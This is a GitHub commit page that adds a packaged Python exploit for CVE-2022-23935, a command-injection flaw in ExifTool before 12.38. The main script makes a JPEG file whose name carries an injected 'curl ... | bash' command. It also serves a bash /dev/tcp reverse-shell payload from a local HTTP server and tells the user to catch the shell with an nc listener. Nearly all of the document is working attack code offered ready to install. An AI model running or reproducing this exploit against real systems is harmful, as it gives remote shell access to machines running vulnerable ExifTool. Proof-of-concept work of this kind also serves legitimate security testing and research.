-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
153 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,34 @@ | ||
# CVE-2022-23935 | ||
🐍 Python Exploit for CVE-2022-23935 | ||
|
||
Staged Reverse Shell Payload Generator for CVE-2022-23935 | ||
|
||
## Example | ||
``` | ||
cve-2022-23935 10.10.16.3 44444 | ||
``` | ||
## Usage | ||
```bash | ||
usage: cve-2022-23935 [-h] [-l SERVER_PORT] [-s SHELL] ip port | ||
|
||
positional arguments: | ||
ip IP Address/Host for Callback | ||
port Port Number for Callback | ||
|
||
options: | ||
-h, --help show this help message and exit | ||
-l SERVER_PORT, --listen SERVER_PORT | ||
Port Number for Server Listen | ||
-s SHELL, --shell SHELL | ||
Remote Shell | ||
|
||
``` | ||
|
||
## Installation | ||
```bash | ||
python3 -m pip install cve-2022-23935-1.0.0-py3-none-any.whl | ||
``` | ||
[Download Latest Release](https://github.com/BKreisel/sqlmap-websocket-proxy/releases/download/1.0.0/cve-2022-23935-1.0.0-py3-none-any.whl) | ||
|
||
## Demo | ||
[![demo](https://asciinema.org/a/558936.svg)](https://asciinema.org/a/558936?autoplay=1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
[build-system] | ||
requires = ["setuptools>=61.0"] | ||
build-backend = "setuptools.build_meta" | ||
|
||
[project] | ||
name = "cve-2022-23935" | ||
version = "1.0.0" | ||
authors = [ | ||
{ name="Brandon Kreisel", email="BKreisel@users.noreply.github.com" }, | ||
] | ||
description = "Python Exploit for CVE-2022-23935 (ExifTool Command Injection)" | ||
readme = "README.md" | ||
requires-python = ">=3.8" | ||
classifiers = [ | ||
"Programming Language :: Python :: 3", | ||
"License :: OSI Approved :: MIT License", | ||
"Operating System :: OS Independent", | ||
] | ||
|
||
dependencies = [ | ||
"rich", | ||
] | ||
|
||
[project.scripts] | ||
cve-2022-23935 = "cve_2022_23935.main:cli" | ||
|
||
[project.urls] | ||
"Homepage" = "https://github.com/BKreisel/CVE-2022-23935" | ||
"Bug Tracker" = "https://github.com/BKreisel/CVE-2022-23935/issues" |
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,92 @@ | ||
import argparse | ||
import rich | ||
import socketserver | ||
import sys | ||
from functools import partial | ||
from http.server import SimpleHTTPRequestHandler | ||
|
||
ASCII_ART = """ | ||
░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░██████╗░██████╗░░█████╗░██████╗░███████╗ | ||
██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░╚════██╗╚════██╗██╔══██╗╚════██╗██╔════╝ | ||
██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗░░███╔═╝░█████╔╝╚██████║░█████╔╝██████╗░ | ||
██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝██╔══╝░░░╚═══██╗░╚═══██║░╚═══██╗╚════██╗ | ||
╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░███████╗██████╔╝░█████╔╝██████╔╝██████╔╝ | ||
░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░╚══════╝╚═════╝░░╚════╝░╚═════╝░╚═════╝░ | ||
PoC for [bold yellow]CVE-2022-23935[/bold yellow] - ExifTool Version < [bold yellow]12.38[/bold yellow] | ||
""" | ||
|
||
# Smallest Possible valid JPEG | ||
# https://gist.github.com/scotthaleen/32f76a413e0dfd4b4d79c2a534d49c0b | ||
JPEG_BYTES = b"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xFF\xDB\x00" \ | ||
b"\x43\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \ | ||
b"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \ | ||
b"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC2\x00" \ | ||
b"\x0B\x08\x00\x01\x00\x01\x01\x01\x11\x00\xFF\xC4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00" \ | ||
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xDA\x00\x08\x01\x01\x00\x01\x3F\x10" | ||
|
||
FILENAME_FMT = "curl {ip}:{port} | {shell} |" | ||
REVERSE_SHELL_FMT = "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5" | ||
|
||
# --------------------------------------------------------------------------------------------------------------------- | ||
class WebHandler(SimpleHTTPRequestHandler): | ||
# ----------------------------------------------------------------------------------------------------------------- | ||
def __init__(self, payload: str, *args, **kwargs): | ||
self.payload = payload | ||
super().__init__(*args, **kwargs) | ||
# ----------------------------------------------------------------------------------------------------------------- | ||
def do_GET(self): | ||
success("Got Request. Sent Payload 🏴☠️") | ||
self.send_response(200) | ||
self.end_headers() | ||
self.wfile.write(self.payload.encode()) | ||
sys.exit(0) | ||
|
||
# ----------------------------------------------------------------------------------------------------------------- | ||
def log_message(self, format, *args): | ||
pass | ||
|
||
# --------------------------------------------------------------------------------------------------------------------- | ||
def error(txt: str): | ||
rich.print(f"[red][-] Error: [/red]{txt}") | ||
sys.exit(1) | ||
|
||
# --------------------------------------------------------------------------------------------------------------------- | ||
def status(txt: str, prefix=""): | ||
rich.print(prefix + f"[blue][*][/blue] {txt}") | ||
|
||
# --------------------------------------------------------------------------------------------------------------------- | ||
def success(txt: str, prefix=""): | ||
rich.print(prefix + f"[green][+][/green] {txt}") | ||
|
||
# --------------------------------------------------------------------------------------------------------------------- | ||
def cli(): | ||
parser = argparse.ArgumentParser() | ||
parser.add_argument("ip", help="IP Address/Host for Callback") | ||
parser.add_argument('port', help="Port Number for Callback") | ||
parser.add_argument('-l', '--listen', dest="server_port", help="Port Number for Server Listen", default=55555) | ||
parser.add_argument('-s', '--shell', default="bash", help="Remote Shell") | ||
args = parser.parse_args() | ||
rich.print(ASCII_ART) | ||
|
||
filename = FILENAME_FMT.format(shell=args.shell, ip=args.ip, port=args.server_port) | ||
payload = REVERSE_SHELL_FMT.format(shell=args.shell, ip=args.ip, port=args.port) | ||
|
||
status(f"Creating File: \"{filename}\"") | ||
|
||
with open(filename, "wb") as fd: | ||
fd.write(JPEG_BYTES) | ||
|
||
success("DONE.") | ||
status(f"Use Listener: [bold cyan]nc -nvlp {args.port} [/bold cyan]") | ||
|
||
try: | ||
handler = partial(WebHandler, payload) | ||
with socketserver.TCPServer(("", args.server_port), handler) as httpd: | ||
status(f"Server Started on {args.server_port} (Ctrl+C to stop)\n") | ||
httpd.serve_forever() | ||
except KeyboardInterrupt: | ||
status("Quitting...") | ||
sys.exit(0) | ||
except Exception as e: | ||
error(f"Exception: {e}") |